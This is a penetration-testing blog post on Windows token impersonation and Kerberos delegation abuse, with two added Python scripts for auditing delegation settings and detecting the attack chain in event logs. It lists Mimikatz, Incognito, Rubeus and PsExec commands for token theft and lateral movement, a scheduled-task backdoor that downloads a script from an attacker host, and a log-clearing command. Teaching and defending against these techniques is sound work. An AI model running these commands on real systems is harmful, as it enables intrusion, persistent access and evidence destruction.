Breaking the Chain- Exploiting Token Abuse for Lateral Movement


Daksh Kaur is a freelance cybersecurity writer who has worked with top brands like SecurityHQ, Red Sift, DuoCircle, EasyDMARC, and PowerDMARC. She creates blogs, articles, eBooks, whitepapers, and newsletters on topics like email phishing protection and penetration testing. Connect with me at daksh@turtlewords.com to talk about content creation for your business.


Penetration testers can take over a user's identity without ever cracking their password. They do this by simulating a token impersonation attack, which works much like a digital mask. A token is like the backstage pass a user receives when logging in to a system or application. In technical terms, a token is a data element that serves as proof of a person's identity or of their right to access network resources. Whenever a user logs in, the system issues an access token that carries information about their identity and access rights. These tokens stay active for the duration of the user's session, acting as proof of identity and permissions.

If a penetration tester gets unauthorized access to this token, they can pretend to be a legitimate user and perform operations with their privileges. This blog revolves around how pen testers simulate token impersonation and use it to perform escalation.

What is token impersonation?


Token impersonation is a pen testing technique in which a tester obtains domain admin privileges when the logged-on user is a domain administrator. It is commonly seen in Windows environments and is considered a key post-exploitation method. Once they hold the user's token, testers move laterally and sometimes pivot to other domain-joined machines on the same network.

Token impersonation is one of the common methods real-world attackers use to break into systems. It has become a headache for security analysts, mainly because distributed systems and service-oriented architectures now take center stage. Since these models spread access decisions across multiple parties, they create more points for attackers to exploit. That is exactly why penetration testers simulate it regularly.

Types of tokens impersonated by penetration testers

In the Windows environment, two types of tokens matter most to penetration testers: impersonation tokens and delegation tokens. They determine how far a process may act on behalf of another user.

1. Impersonation tokens

An impersonation token allows a process to temporarily adopt the security context of another user on the same machine. This is commonly used when a server process needs to perform tasks on behalf of a connected client.

Penetration testers abuse impersonation tokens with tools like Mimikatz or Incognito. They often simulate this attack against services running with SeImpersonatePrivilege, because that privilege lets them impersonate privileged accounts.

Example of Mimikatz command for token impersonation:

mimikatz.exe "privilege::debug" "token::elevate" "exit"

2. Delegation tokens

A delegation token is a stronger form of impersonation token. It allows a process to act on behalf of another user across different systems on the same network. This is most often seen in Kerberos delegation, where, for example, a web server accesses resources on a separate database server using the client's credentials.

Penetration testers abuse delegation tokens in Kerberos delegation attacks and usually pair them with Rubeus, which lets them manipulate tickets for privilege escalation or remote system access.

Example of Rubeus command for token delegation attack:

Rubeus.exe tgtdeleg /user:targetuser /rc4:HASH /domain:targetdomain
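Whether a delegation token can be abused at all is decided by Active Directory attributes, so the defender's counterpart to this section is an audit of those settings. The following Python script is an added example, not code from the post or from any tool it names: it runs over constructed account records (labelled as such in the code), uses the documented userAccountControl flag bits, and assumes an export carrying sAMAccountName, userAccountControl, memberOf and msDS-AllowedToDelegateTo. It also covers the Kerberos delegation misconfiguration the post's Step 5 relies on.

```python
"""Audit constructed AD account records for Kerberos delegation weaknesses.

Added example (not the post's own code). SAMPLE_ACCOUNTS is constructed for
illustration; in practice the records would come from an LDAP export of
userAccountControl, memberOf and msDS-AllowedToDelegateTo.
"""

# Documented userAccountControl bits
UF_NORMAL_ACCOUNT = 0x200
UF_TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
UF_NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample export (assumed field names)
SAMPLE_ACCOUNTS = [
    {"sam": "svc-web", "uac": UF_NORMAL_ACCOUNT | UF_TRUSTED_FOR_DELEGATION,
     "memberOf": [], "delegateTo": []},
    {"sam": "svc-api", "uac": UF_NORMAL_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "memberOf": [], "delegateTo": ["MSSQLSvc/db01.corp.example:1433"]},
    {"sam": "svc-report", "uac": UF_NORMAL_ACCOUNT,
     "memberOf": [], "delegateTo": ["HTTP/portal.corp.example"]},
    {"sam": "da.alice", "uac": UF_NORMAL_ACCOUNT,
     "memberOf": ["Domain Admins"], "delegateTo": []},
    {"sam": "da.bob", "uac": UF_NORMAL_ACCOUNT | UF_NOT_DELEGATED,
     "memberOf": ["Domain Admins", "Protected Users"], "delegateTo": []},
    {"sam": "jdoe", "uac": UF_NORMAL_ACCOUNT, "memberOf": [], "delegateTo": []},
]


def audit_delegation(accounts):
    """Return a list of (sAMAccountName, severity, finding) tuples."""
    findings = []
    for acct in accounts:
        uac = acct["uac"]
        groups = set(acct["memberOf"])
        privileged = bool(groups & PRIVILEGED_GROUPS)

        if uac & UF_TRUSTED_FOR_DELEGATION:
            # Every TGT presented to this account's host is cached and reusable:
            # the setting that lets a delegation-token chain reach the whole domain.
            findings.append((acct["sam"], "HIGH", "unconstrained delegation enabled"))

        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            # Protocol transition (S4U2Self) lets the service obtain tickets for a
            # user who never authenticated to it with Kerberos.
            findings.append((acct["sam"], "HIGH",
                             "constrained delegation with protocol transition"))
        elif acct["delegateTo"]:
            findings.append((acct["sam"], "MEDIUM",
                             "constrained delegation to " + ", ".join(acct["delegateTo"])))

        if privileged:
            # Admin tokens should never be delegable at all.
            if not (uac & UF_NOT_DELEGATED):
                findings.append((acct["sam"], "HIGH",
                                 "privileged account not marked 'sensitive, cannot be delegated'"))
            if "Protected Users" not in groups:
                findings.append((acct["sam"], "MEDIUM",
                                 "privileged account not in Protected Users"))
    return findings


if __name__ == "__main__":
    for sam, severity, finding in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"[{severity}] {sam}: {finding}")
```

On the constructed data the two service accounts with delegation rights and the unprotected domain admin are flagged, while the admin marked "cannot be delegated" and placed in Protected Users produces nothing. Those two settings are what make a stolen delegation token useless against an administrator.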

A general flow of the simulated token impersonation attack


Here’s a detailed breakdown of the process using Mimikatz, Incognito, and PsExec:

Step 1: Gaining access (post-exploitation prerequisite)

Pen testers usually begin by gaining an initial foothold on the target system through tactics such as social engineering, phishing, credential stuffing, or exploiting a vulnerability. Once they have stable access, they escalate privileges to NT AUTHORITY\SYSTEM to get their hands on high-privilege tokens, for example by running getsystem in a Meterpreter session.

Step 2: Enumeration

With elevated access, the next step is to enumerate the available tokens and work out which ones belong to privileged accounts. White hat hackers can run mimikatz.exe "privilege::debug" "token::list" to see all tokens associated with sensitive accounts such as Domain Admins or Local Administrators. They usually look for tokens marked 'delegation' or 'impersonation', as these are ideal for lateral movement.

Step 3: Impersonate a token

After identifying an exploitable token, the tester impersonates it to adopt the security context of the account it belongs to. Mimikatz does this with mimikatz.exe "token::elevate". Alternatively, within a Meterpreter session, testers can load Incognito, list available tokens with list_tokens -u, and impersonate one with impersonate_token "DOMAIN\Admin".

Step 4: Pivot to another system (lateral movement)

With a valid impersonated token, the tester can proceed to execute commands on remote systems. Tools like PsExec simplify this step by allowing testers to run commands directly on target machines. For example, the command psexec.exe \\<TARGET_IP> -u DOMAIN\Administrator -p <PASSWORD> cmd.exe opens a remote command shell, while psexec.exe \\<TARGET_IP> -s powershell.exe -Command "Invoke-Command {whoami}" runs PowerShell commands remotely.

Step 5: Abuse Kerberos for domain-wide access

In cases where the Kerberos delegation is misconfigured, testers can abuse this by extracting TGTs (Ticket Granting Tickets) using Rubeus. Commands like Rubeus.exe dump can extract tickets, while Rubeus.exe ptt /ticket:<BASE64_TICKET> allows testers to inject a stolen TGT, enabling domain-wide impersonation. Following this, testers can confirm access by listing shared resources with commands like dir \\<TARGET_IP>\C$.

Step 6: Maintain persistence

To keep access after successful lateral movement, establishing persistence is crucial. This can be achieved by creating scheduled tasks or services. For instance, the following schtasks command sets up a recurring backdoor:

schtasks /create /tn "Backdoor" /tr "cmd.exe /c powershell.exe -c 'Invoke-WebRequest -Uri http://<attacker_ip>/shell.ps1 -OutFile C:\backdoor.ps1; Start-Process C:\backdoor.ps1'" /sc minute /mo 5 /ru System

Step 7: Clean the traces

Finally, ethical hackers need to clean up after themselves so that no residue of the engagement is left behind. Clearing logs with wevtutil cl Security reduces noise, but it must be done with caution and within the agreed guidelines. It is also important to revoke the tokens used and revert any system changes so that the system's integrity is not affected.

Throughout the entire process, penetration testers should follow authorized Rules of Engagement (RoE), document their actions, and provide detailed reports to help the organization improve its security posture.
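Every step in the flow above leaves a record that a defender can correlate: the privilege elevation in Steps 1 and 2 appears as special privileges at logon, the PsExec hops in Step 4 as a burst of network logons plus a service install, the scheduled task in Step 6 as a task-creation event, and the log clearing in Step 7 as an audit-log-cleared event. The following Python detector is an added example, not code from the post or from any tool it names: it runs over constructed Windows Security and System event records (4672, 4624, 7045, 4698, 1102), and the thresholds LATERAL_HOSTS and LATERAL_WINDOW are assumptions a SOC would tune.

```python
"""Correlate constructed Windows event records into the token-abuse chain.

Added example, not the post's code. SAMPLE_EVENTS is constructed; field names
follow the Windows Security/System event schema. Thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SENSITIVE_PRIVS = {"SeDebugPrivilege", "SeImpersonatePrivilege", "SeTcbPrivilege"}
LATERAL_HOSTS = 3                   # distinct targets from one (user, source) before alerting
LATERAL_WINDOW = timedelta(minutes=10)


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed sample events, in the order the chain above would produce them
SAMPLE_EVENTS = [
    {"time": ts("2024-05-01 09:00:10"), "id": 4672, "host": "WS01", "SubjectUserName": "jdoe",
     "PrivilegeList": "SeDebugPrivilege SeImpersonatePrivilege"},
    {"time": ts("2024-05-01 09:02:00"), "id": 4624, "host": "FS01", "TargetUserName": "administrator",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.15"},
    {"time": ts("2024-05-01 09:02:30"), "id": 4624, "host": "DB01", "TargetUserName": "administrator",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.15"},
    {"time": ts("2024-05-01 09:03:05"), "id": 4624, "host": "DC01", "TargetUserName": "administrator",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "IpAddress": "10.0.0.15"},
    {"time": ts("2024-05-01 09:03:20"), "id": 7045, "host": "DC01", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    {"time": ts("2024-05-01 09:05:00"), "id": 4698, "host": "DC01", "SubjectUserName": "administrator",
     "TaskName": "\\Backdoor",
     "TaskContent": "<Exec><Command>cmd.exe</Command><Arguments>/c powershell.exe -c "
                    "Invoke-WebRequest ...</Arguments></Exec><UserId>S-1-5-18</UserId>"},
    {"time": ts("2024-05-01 09:09:00"), "id": 1102, "host": "DC01", "SubjectUserName": "administrator"},
    # Benign noise: a single Kerberos network logon by a backup account
    {"time": ts("2024-05-01 11:00:00"), "id": 4624, "host": "FS01", "TargetUserName": "backup",
     "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.0.40"},
]


def detect(events):
    """Return (severity, host, message) alerts in event order."""
    alerts = []
    net_logons = defaultdict(list)   # (user, source ip) -> [(time, target host)]
    for e in sorted(events, key=lambda x: x["time"]):
        h = e["host"]
        if e["id"] == 4672:
            privs = set(e["PrivilegeList"].split()) & SENSITIVE_PRIVS
            if privs:   # Steps 1-2: privileges that enable token theft/impersonation
                alerts.append(("MEDIUM", h, f"{e['SubjectUserName']} logged on with "
                               + ", ".join(sorted(privs))))
        elif e["id"] == 4624 and e["LogonType"] == 3:
            key = (e["TargetUserName"], e["IpAddress"])
            net_logons[key].append((e["time"], h))
            recent = {host for t, host in net_logons[key] if e["time"] - t <= LATERAL_WINDOW}
            if len(recent) == LATERAL_HOSTS:   # Step 4: fire once, when the threshold is crossed
                alerts.append(("HIGH", h, f"{key[0]} from {key[1]} reached "
                               f"{LATERAL_HOSTS} hosts within {LATERAL_WINDOW}"))
        elif e["id"] == 7045 and e["ServiceName"].upper() == "PSEXESVC":
            alerts.append(("HIGH", h, "PsExec service installed"))          # Step 4
        elif e["id"] == 4698:
            content = e["TaskContent"]
            as_system = "<UserId>S-1-5-18</UserId>" in content
            cradle = "Invoke-WebRequest" in content or "DownloadString" in content
            if as_system and cradle:                                         # Step 6
                alerts.append(("HIGH", h, f"task {e['TaskName']} runs a download cradle as SYSTEM"))
        elif e["id"] == 1102:                                                # Step 7
            alerts.append(("CRITICAL", h, f"Security log cleared by {e['SubjectUserName']}"))
    return alerts


def hosts_with_chain(alerts, min_alerts=3):
    """Hosts where several independent indicators stack up: the chain, not one event."""
    counts = defaultdict(int)
    for _, host, _ in alerts:
        counts[host] += 1
    return {host for host, n in counts.items() if n >= min_alerts}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for severity, host, msg in found:
        print(f"[{severity}] {host}: {msg}")
    print("chain on:", hosts_with_chain(found))
```

The single backup-account logon never reaches the lateral threshold and produces no alert, while DC01 accumulates four independent indicators. Note that the 1102 event survives the wevtutil clear itself (it is the first record written afterwards), which is why forwarding Security logs off-host before Step 7 matters more than any single rule.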

Did you like the blog?

Hey there! I’m Daksh Kaur, a freelance cybersecurity writer passionate about breaking down complex topics like email authentication, vulnerability assessment, and penetration testing. My goal? To write in-depth technical blogs that don’t feel like you’re decoding a cipher. 

I’m currently looking to team up with a cybersecurity company for a long-term freelance collaboration. Your brand + my expertise = the ultimate power combo! 

Let’s chat at daksh@turtlewords.com — I’m all ears (and keyboards)!
